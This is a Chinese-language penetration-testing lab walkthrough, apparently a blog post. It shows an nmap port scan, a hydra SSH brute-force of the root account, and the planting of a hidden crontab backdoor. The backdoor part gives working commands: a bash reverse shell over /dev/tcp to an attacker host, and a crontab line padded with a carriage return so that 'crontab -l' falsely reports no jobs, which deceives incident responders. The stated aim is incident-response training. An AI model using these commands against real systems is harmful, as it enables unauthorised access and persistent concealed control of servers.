渗透测试模拟实战（含靶场环境）——暴力破解、留crontab隐藏后men_漏洞靶场模拟真实环境

本次实验主要是为了应急响应打基础，从攻击者的角度出发，知己知彼，百战不殆

一、环境搭建

目标服务器无WEB网站，
访问目标发现只有默认的一个apache的默认页面
IP地址：192.168.184.142

靶场环境、使用的工具，放在了 知识星球 中。

二、模拟攻击

2.1 扫描端口

使用nmap扫描

因为没有WEB网站，使用 nmap 扫描是否有开放的端口

nmap -sS 192.168.184.142
1

通过扫描结果发现，目标服务器开放了22与3306端口，其中22号端口是远程登录链接的可以进行暴力破解，3306端口是mysql数据库的端口，也是可以暴力破解的，本案例只演示 22 端口暴力破解

2.2 暴力破解拿到root密码

使用 hydra 爆破 ssh 登录密码
因为Linux服务器的账户默认都是root，一般不会更改，那么使用 hydra 爆破 ssh root账户登录密码

hydra.exe -l root -P C:\Users\Downloads\top1000.txt ssh://192.168.184.142
#-l 用户名
#-L 用户名字典的根路径
#-p 密码 
#-P 密码字典的根路径 
1
2
3
4
5

使用弱口令 排名前1000位的字典 top1000，进行爆破，稍等几分钟后，就爆破出来了密码为：1qaz2wsx3edc

使用 xshell 远程连接测试，发现成功登录

2.3 留crontab隐藏后men

好不容易拿下一个服务器，得留个后men以后经常使用，但是又不想让管理员轻而易举的发现该后men的位置，那就留一个crontab隐藏后men吧

crontab介绍：
crontab：定时任务，是用来定期执行程序的命令，crond 命令每分钟会定期检查是否有要执行的工作，如果有要执行的工作便会自动执行该工作。
那么把后men放在定时任务中，就会定期执行后men，比如一分钟执行一次、一小时执行一次

crontab查看定时任务命令：

crontab -l
1

**意思：**每分钟执行一次 写abc.txt文件，文件内容是$(date) aaa

接下来需要留crontab隐藏后men了

第一步：
植入crontab隐藏后men需要的文件

1.sh文件内容

#!/bin/bash
bash -i >& /dev/tcp/192.168.184.145/5555 0>&1

1
2
3

**意思是：**反弹shell到IP地址：192.168.184.145

2.sh文件内容

(crontab -l;printf "* * * * * /root/1.sh;\rno crontab for `whoami`%100c\n")|crontab -
1

**意思是：**建立crontab隐藏后men
注意： /root/1.sh 的位置是你把1.sh文件下载道德位置，本案例是计划下载到 /root 目录下，根据自己的实际情况进行修改即可

第二步：
我们把1.sh、2.sh 文件放在本地搭建的web服务上，下载到受害主机

下载完1.sh与2.sh文件后，给bash文件添加执行权限

chmod 777 1.sh
chmod 777 2.sh
1
2

第三步：

kali打开监听端口，等待shll连接

第四步：

查看现在是否含有定时任务，发现目标系统并没有定时任务

crontab -l
1

第五步：

最后执行2.sh文件，如果2.sh的命令成功执行则会返回如下图所示的提示“no crontab for root”，虽然是提示 root账户没有定时任务，但其实定时任务已经成功创建，

./2.sh
1

过一分钟之后，kali监听的5555端口，会收到shell连接消息，crontab隐藏后men创建成功（其中ls-l 查看的就是受害者服务的内容）
注意： 在shell中有些命令不能执行，

第六步：
接下来查看一下隐藏后men是不是真的隐藏了

crontab -l
1

发现真的是没有定时任务

虽然使用crontab -l没有发现定时任务，但是定时任务已经成功植入，只有通过在 /var/spool/cron 目录下 vi root 才可以看到真实的定时任务，连cat都看不到，隐藏的很好，会给应急响应人员带来一定程度的误导

更多web安全工具、存在漏洞的网站搭建源码、渗透测试思路，收集整理在知识星球。也可搜索关注微信公众号：W小哥